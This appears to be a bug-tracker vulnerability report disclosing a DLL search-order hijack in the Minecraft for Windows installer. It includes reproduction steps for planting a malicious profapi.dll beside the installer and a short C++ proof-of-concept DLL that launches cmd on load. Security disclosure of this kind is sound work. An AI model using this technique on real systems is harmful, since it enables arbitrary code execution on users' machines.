MCL-20908minecraft installer for Windows Uncontrolled search path Romote code Execution
MineCraft for Windows Installer Uncontrolled Search Path Element Remote Code Execution Vulnerability
Summary:
- Uncontrolled Search Path Element that occurs while the setup is being executed and the dll is being loaded.
- When dll was loaded, the GetSystemDirectory function was not used, so the load was attempted by searching from the wrong path.
Environment
- Windows10 x64
- MinecraftInstaller.exe(version: 1.4.7990.2489)
Steps To Reproduce:
- Target dll is profapi.dll.
- Create profapi.dll containing malicious code in the "C:\Users\USER\Downloads" (Like "C:\Users\USER\Downloads\profapi.dll"). Because the installer is in the "C:\Users\USER\Downloads" , it searches from the "C:\Users\USER\Downloads" for dll loading.
- Due to step 2, the installer and malicious profapi.dll exist on the same path. Running the installer in this situation executes the malicious code of the dll.
Supporting Material/References:
[list any additional material (e.g. screenshots, logs, etc.)]
- CREDIT INFORMATION: { DoHyun Lee(@l33d0hyun) and SeungYun LEE(@SeungYun_Le2) } of Korea University Sejong Campus & { JaeHeng Yoon(@onnoveath) } of JENBlack Soft
- [attachment / reference]
-
- software(MinecraftInstaller.exe) download path : https://www.minecraft.net/ko-kr/download
-
- analysis1.png shows that the dll load path is not controlled and navigates from the wrong path.
- analysis1.png shows that the dll load path is not controlled and navigates from the wrong path.
-
- analysis2.png shows that the installer and profapi.dll are on the same path.
- analysis2.png shows that the installer and profapi.dll are on the same path.
-
- analysis3.png shows that cmd is executed by the malicious code of profapi.dll when the installer is executed in analysis2.png.
- analysis3.png shows that cmd is executed by the malicious code of profapi.dll when the installer is executed in analysis2.png.
-
- profapi.dll is poc file.
-
- poc code is cpp. (below)
#include <Windows.h> void exploit() { system("cmd"); } BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exploit, 0, 0, 0); break; case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; }
- poc code is cpp. (below)
2021-12-13, 12:00 PM
2021-12-28, 11:29 AM
2021-12-28, 11:29 AM
1
3
677711
2.2.8351 (Windows), 2.2.8352 (New Windows App)
-